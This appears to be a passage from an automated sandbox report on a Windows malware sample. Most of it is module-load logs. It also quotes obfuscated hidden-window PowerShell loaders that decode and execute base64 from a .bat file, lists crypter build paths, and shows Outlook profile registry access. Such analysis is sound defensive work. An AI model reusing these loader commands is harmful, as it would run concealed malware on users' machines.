              Source: C:\Windows\SysWOW64\PING.EXESection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: version.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: windowscodecs.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: edputil.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dpapi.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bf754aa-c967-445c-ab3d-d8fda9bae7ef}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\PING.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdb source: powershell.exe, 00000002.00000002.2227274185.000001DC2D7E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdb source: powershell.exe, 00000002.00000002.1839501596.000001DC185B8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdbhP source: powershell.exe, 00000002.00000002.1839501596.000001DC185B8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Net_Loader\Net_Loader\obj\Release\Net_Loader.pdb source: PING.EXE, 0000000A.00000002.2229017631.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2508310620.00000000069F0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\PhantomShark\Documents\Coding Projects\Marrow_Crypter\Startup\Startup\obj\x64\Release\Startup.pdb source: explorer.exe, 00000006.00000002.2940202775.0000000010881000.00000004.00000001.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.pdbH source: powershell.exe, 00000002.00000002.2227274185.000001DC2D7E3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: PING.EXE, 0000000A.00000002.2230752775.0000000007440000.00000004.08000000.00040000.00000000.sdmp, PING.EXE, 00000017.00000002.2509800489.0000000006C80000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: .C:\Users\user\AppData\Local\Temp\zozwmnym.pdb source: powershell.exe, 00000012.00000002.1992910476.0000026212AA9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: .C:\Users\user\AppData\Local\Temp\zozwmnym.pdbhP source: powershell.exe, 00000012.00000002.1992910476.0000026212AA9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\zozwmnym.pdb& source: powershell.exe, 00000012.00000002.2273172978.0000026228BF3000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 10.2.PING.EXE.6247aa0.0.raw.unpack, QI6Jy4WEhefhjRy8hP9.cs.Net Code: Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777297)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777248)),Type.GetTypeFromHandle(eUOp5DZUGvdM9Wa1LHI.zvEep2Fvcd(16777365))})
              .NET source code contains potential unpacker
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 10.2.PING.EXE.7440000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              PowerShell case anomaly found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWErSHelL -W h -E JABLAGkAVQBMAHUAZgA9ACcATwBCAHEAWABsAFAARwBWAEcAbAB2ACcAOwBwAG8AVwBlAHIAUwBIAGUAbABsACAALQBFAFgAZQBjACAAQgBZAFAAYQBzAHMAIAAtAEYASQBsAGUAIAAiAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABQAGgAYQBuAHQAbwBtAC4AcABzADEAIgA7ACQAUwBBAFUAWQB2AG0AaQBpAHIASQBaAD0AJwBhAEsATwBTAHYAQgBqAEsAdgB2AEsAJwA=Jump to behavior
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POWerSHeLl -W h -commAND "$ZKpNlUo='C:\Users\user\Desktop\email.bat';$RvsTrHt=-983272..-1;$KPUkIuO=[sysTEM.teXt.eNCoDING]::UTF8.GetstRING([cOnveRT]::FrOMbASE64String((GeT-COnTent $ZKpNlUo -Raw)[$RvsTrHt]));iex $KPUkIuO"Jump to behavior
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 23.2.PING.EXE.6c50000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 10.2.PING.EXE.7410000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000017.00000002.2509704658.0000000006C50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2230659559.0000000007410000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000017.00000002.2494654093.00000000046A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2194405756.0000000004E21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PING.EXE PID: 7032, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mlbsu2za\mlbsu2za.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\fhrgxrvn\fhrgxrvn.cmdline"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zozwmnym.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA97C46 pushad ; retf 2_2_00007FFD9BA97C5D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA987BC push ss; iretd 2_2_00007FFD9BA9879A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA976F2 push es; iretd 2_2_00007FFD9BA9772A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA98B55 push edx; iretd 2_2_00007FFD9BA98B5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA98B5C push ebx; iretd 2_2_00007FFD9BA98B7A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA98739 push ss; iretd 2_2_00007FFD9BA9879A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA98B25 push eax; iretd 2_2_00007FFD9BA98B3A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA9772C push es; iretd 2_2_00007FFD9BA9772A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BA97D7F push eax; retf 2_2_00007FFD9BA97DB2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6C3DE push eax; retf 2_2_00007FFD9BB6C3E4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6A3F1 push cs; retf 2_2_00007FFD9BB6A4CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6A7FF push cs; retf 2_2_00007FFD9BB6A800
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6C011 push eax; retf 2_2_00007FFD9BB6C012
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6A41C push cs; retf 2_2_00007FFD9BB6A4CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6BFC6 push eax; retf 2_2_00007FFD9BB6BFC7
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6CB82 push eax; retf 2_2_00007FFD9BB6CB83
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9BB6C789 push eax; retf 2_2_00007FFD9BB6C78A
